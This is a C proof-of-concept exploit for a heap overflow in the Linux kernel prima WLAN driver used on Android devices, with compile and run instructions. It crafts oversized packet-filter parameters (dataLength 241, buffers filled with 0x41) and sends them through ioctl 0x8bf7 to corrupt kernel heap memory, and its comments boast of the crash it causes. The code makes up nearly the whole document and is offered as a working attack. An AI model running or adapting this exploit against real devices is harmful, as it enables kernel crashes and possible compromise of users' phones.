Linux Kernel prima WLAN Driver Heap Overflow

`/*  
* Coder: Shawn the R0ck, [[email protected]]  
* Co-worker: Pray3r, [[email protected]]  
* Compile:  
* # arm-linux-androideabi-gcc wext_poc.c --sysroot=$SYS_ROOT -pie   
* # ./a.out wlan0  
* Boom......shit happens[ as always];-)  
*/  
  
#include <stdio.h>  
#include <string.h>  
#include <stdlib.h>  
#include <sys/ioctl.h>  
#include <sys/types.h>  
#include <sys/socket.h>  
#include <linux/wireless.h>  
#include <errno.h>  
  
typedef unsigned char v_U8_t;  
#define HDD_MAX_CMP_PER_PACKET_FILTER 5  
  
struct PacketFilterParamsCfg {  
v_U8_t protocolLayer;  
v_U8_t cmpFlag;  
v_U8_t dataOffset;  
v_U8_t dataLength;  
v_U8_t compareData[8];  
v_U8_t dataMask[8];  
};  
  
typedef struct {  
v_U8_t filterAction;  
v_U8_t filterId;  
v_U8_t numParams;  
struct PacketFilterParamsCfg  
paramsData[HDD_MAX_CMP_PER_PACKET_FILTER];  
} tPacketFilterCfg, *tpPacketFilterCfg;  
  
int main(int argc, const char *argv[])  
{  
if (argc != 2) {  
fprintf(stderr, "Bad usage\n");  
fprintf(stderr, "Usage: %s ifname\n", argv[0]);  
return -1;  
}  
  
struct iwreq req;  
strcpy(req.ifr_ifrn.ifrn_name, argv[1]);  
int fd, status, i = 0;  
fd = socket(AF_INET, SOCK_DGRAM, 0);  
tPacketFilterCfg p_req;  
  
/* crafting a data structure to triggering the code path */  
req.u.data.pointer =  
malloc(sizeof(v_U8_t) * 3 +  
sizeof(struct PacketFilterParamsCfg) * 5);  
p_req.filterAction = 1;  
p_req.filterId = 0;  
p_req.numParams = 3;  
for (; i < 5; i++) {  
p_req.paramsData[i].dataLength = 241;  
memset(&p_req.paramsData[i].compareData, 0x41, 16);  
}  
  
memcpy(req.u.data.pointer, &p_req,  
sizeof(v_U8_t) * 3 +  
sizeof(struct PacketFilterParamsCfg) * 5);  
  
if (ioctl(fd, 0x8bf7, &req) == -1) {  
fprintf(stderr, "Failed ioct() get on interface %s: %s\n",  
argv[1], strerror(errno));  
} else {  
printf("You shouldn't see this msg...\n");  
}  
  
}  
  
`